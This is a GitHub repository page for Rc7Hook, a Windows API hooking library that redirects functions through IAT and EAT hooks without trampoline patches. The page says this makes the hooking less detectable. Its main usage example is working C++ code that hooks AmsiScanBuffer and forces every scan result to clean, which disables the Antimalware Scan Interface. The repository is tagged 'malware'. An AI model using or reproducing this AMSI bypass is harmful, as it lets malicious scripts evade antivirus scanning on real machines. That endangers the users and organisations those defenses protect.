Skip to content

internetangel/Rc7Hook

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
Rc7Hook
Rc7Hook
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
Rc7Hook.sln
Rc7Hook.sln
 
 

Repository files navigation

Rc7Hook

A Patchless Windows API Hooking Library.

How It Works

Rc7hook combines both IAT Hooking and EAT Hooking to completely redirect the target function to the specified hook procedure.

This means there's no need for patching the function with a trampoline, which is more detectable.

Running The Examples

Rc7hook.exe <EXAMPLE>

Examples:
- MessageBoxHook
- AmsiHook

Usage

AmsiScanBuffer Hook | Bypassing AMSI

typeAmsiScanBuffer orgAmsiScanBuffer;
HRESULT hookAmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT* result) {
	HRESULT orgCallResult = orgAmsiScanBuffer(amsiContext, buffer, length, contentName, amsiSession, result);

	(*result) = AMSI_RESULT_CLEAN;

	return orgCallResult;
}

void bypassAmsi() {

	// assuming that amsi.dll is loaded

	Rc7Hook amsiScanBufferHook{ "amsi.dll", "AmsiScanBuffer", hookAmsiScanBuffer, (PVOID*)&orgAmsiScanBuffer };

	if (amsiScanBufferHook.Enable()) {
		printf("[+] Enabled AmsiScanBuffer Hook!\n");
	}
	else {
		printf("[-] Failed to Enable AmsiScanBuffer Hook.\n");
	}

	printf("[*] Press a Key to Unhook.\n");
	getchar();

	if (amsiScanBufferHook.Disable()) {
		printf("[+] Disabled AmsiScanBuffer Hook!\n");
	}
	else {
		printf("[+] Failed to disable AmsiScanBuffer Hook.\n");
	}
}

Issues

  • x86 build's unhooking produces ERROR_ACCESS_VIOLATION

Credits

EAT Hooking Article by Codereversing.

About

A Patchless Windows API Hooking Library.

Topics

windows malware hooking api-hooking rc7hook

Resources

Readme

License

MIT license
Activity

Stars

7 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages